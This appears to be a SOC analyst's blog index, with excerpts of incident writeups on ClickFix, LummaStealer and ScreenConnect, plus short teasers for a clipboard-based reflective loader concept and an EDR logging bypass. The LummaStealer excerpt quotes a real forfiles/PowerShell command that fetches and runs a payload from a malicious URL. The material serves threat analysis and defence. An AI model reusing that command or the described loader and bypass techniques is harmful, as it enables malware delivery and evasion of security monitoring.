====================
== Alert Overload ==
====================
Tales from a SOC analyst

ReflectFix


ClickFix has been the hot topic for over a year now (see all the other ClickFix posts) and recently, FileFix has come out as well (shout out to mr.d0x!). In the spirit of calling every social engineering malware delivery system a “-Fix”, let me introduce you to “ReflectFix”: a reflective .NET loader that uses social engineering to load a remote DLL via reflection. Much like ClickFix or FileFix, ReflectFix uses a social engineering page that copies a URL to the victim’s clipboard and downloads a reflection-based loader. When executed by the victim, this loader takes the last copied string out of the clipboard, downloads the contents into a byte array, and loads and executes that array in memory.


Excerpts from threat briefings on Iranian threats

Excerpts from a threat briefing on IRGC threat groups.

Ignore the TLP Amber, this is TLP Green.


ClickFix - The RAT that (almost) got away


This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

This is an initial writeup for record keeping and incident analysis. This writeup may not cover the full scope of the incident.


Incident Overview

An initial alert came in as an incident on a protected host. This incident was given a score of 1.1/10, and the summary of the included events revolved around a detection of a known hash. One minute after this automated incident message, 4 high-severity detections were created for the host. Three minutes after the first notification, a managed detection was sent, including comments from the EDR vendor’s managed response team.


ClickFix - An Overview


This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

This is strictly an overview of some incidents I have observed or worked. It is not a comprehensive analysis of ClickFix.

Executive Summary

ClickFix is a malware distribution method that relies on social engineering tactics to trick victims into executing malicious commands via the Windows Run menu. This is done through a series of steps, starting with the impersonation of well-known identity verification solutions like Cloudflare or reCAPTCHA. Typically, a user will browse to a compromised domain that contains a JavaScript function that loads the “Fake Captcha” page. This fake page will be styled as a legitimate verification system, tricking the user into complying with the requested verification process. When the user clicks the “Verify” or similar checkbox, malicious code will be copied into the user’s clipboard. Additionally, a window will pop up telling the user to press Windows key + R, then Ctrl + V, and then Enter, which runs the pasted malicious code. More often than not, the malicious code is an installer for a Remote Access Trojan (RAT) or an Infostealer.



Getting Started with Malware Analysis and Reverse Engineering

This page is from internal enterprise documentation that was created for introducing common malware analysis topics. This is not a comprehensive document, and many sections link to online resources. Tool selection and documentation are largely based on what is present in the enterprise lab the document was created for.

Contents

Malware Analysis Workflow


    +-------------------------------------+
    |        Malware Analysis Workflow    |
    +-------------------------------------+
                       |
                       v
         +-----------------------------+
         |     Threat Intelligence     |
         +-----------------------------+
         | - Hash Lookups (VT, HA)     |
         | - IP/Domain Reputation      |
         |   (AbuseIPDB, ThreatFox)    |
         | - Sample Pivoting (Any.run) |
         | - YARA/IoC Extraction       |
         +-----------------------------+
                       |
                       v
         +----------------------------+
         |      Static Analysis       |
         +----------------------------+
         | - File Analysis            | <-- Tools: PEStudio, DIE, HashMyFiles
         | - Code Analysis            |
         | - Disassembly              | <-- Tools: Ghidra, IDA Free
         +----------------------------+
                       |
                       v
         +----------------------------+
         |      Dynamic Analysis      |
         +----------------------------+
         | - Network Monitoring       | <-- Tools: Wireshark, INetSim
         | - Process Monitoring       | <-- Tools: ProcMon, ProcExp
         | - API Call Monitoring      | <-- Tools: API Monitor
         | - Logging                  | <-- Tools: Sysmon, PowerShell logs
         +----------------------------+
                       |
                       v
    +-------------------------------------+
    |  Debugging & Reverse Engineering    |
    +-------------------------------------+
    | - IDA                               | <-- Tools: IDA Pro, Ghidra
    | - x64dbg                            | <-- Tools: x64dbg, Scylla
    +-------------------------------------+

Threat Intelligence

Threat intelligence gathering is an important step in scoping the work that needs to be done during the analysis. Often, a sample has defining traits that can be searched for in public threat intel spaces like VirusTotal, Tria.ge, or any other sandboxing/intel platform. By searching for these traits (hashes, filenames, networking indicators, etc.), you can determine whether a sample needs to be reversed, categorized as a variant, or simply documented as a known sample.


Big EDR Hates This One Easy Trick!

Bypass Details

This will be a quick post, but I was playing around with a couple of EDR bypass methods this week after getting some inspiration from a ClickFix incident that abused SSH ProxyCommand. I wanted to write an EDR logging bypass that used SSH to launch arbitrary commands, improving on the method I saw in the incident. Unfortunately, I didn’t do that. However, I did write up a simple and compact method to bypass command line logging. It’s confirmed working with a major EDR product and likely works for all products (maybe, idk, I just have the one to test on).


ClickFix - freewebstatics


This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

“ClickFix attacks are a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts.” (Office of Information Security)

Incident Overview

The SOC was alerted to a Potentially Unwanted Program (PUP) execution on a host device. This PUP was named client32.exe, which additionally flagged as a file that may be imitating a system file. Investigation of this alert revealed a base file path of "C:\Users\%USER%\AppData\Roaming\VFrTdT\client32.exe". This file belongs to the NetSupport Remote Monitoring and Management (RMM) tool, which is commonly used by threat actors to gain control of victim devices.


ClickFix - Smartlifeshift


This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

“ClickFix attacks are a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts.” (Office of Information Security)

Incident Overview

ClickFix has been a persistent threat since its emergence in 2024. The SOC has seen and resolved alerts stemming from ClickFix on a weekly basis, with incidents heavily ramping up in 2025. Recently, there has been a troubling trend of added complexity in ClickFix events. This incident in particular uses stealth and persistence measures to deploy a Lumma payload after tricking users into executing a PowerShell command that serves as a loader for a separate malware dropper. This incident also demonstrates some obfuscation and session control measures: the loader uses a special User-Agent string to download the payload from the threat-actor-controlled infrastructure, and any attempt to connect to the server without the proper headers fails. Despite these improvements, EDR was able to detect and prevent the initial download from completing.


Lumma

LummaStealer

Brief write-up on LummaStealer events observed in managed environments

This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

Initial Detection Events

Users download a Windows .lnk file from a malicious site that contains a command to launch forfiles.exe (a LOLBin for executing commands) with a command line similar to "C:\Windows\System32\forfiles.exe" /p C:\ /m Use*s /c "powershell Start-Process \*i*\*2\m?h*e https://ftp.timeless-tales.shop/api/reg/Panto". This command line works as follows:


ScreenConnect


This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

Initial Detection Events

The alert came from a concierge security service for the download and execution of an actor-controlled ScreenConnect RMM tool. The process was not blocked by EDR. SOC investigation concluded that the user executed a malicious application that may have installed ScreenConnect to give the actor access to the device.
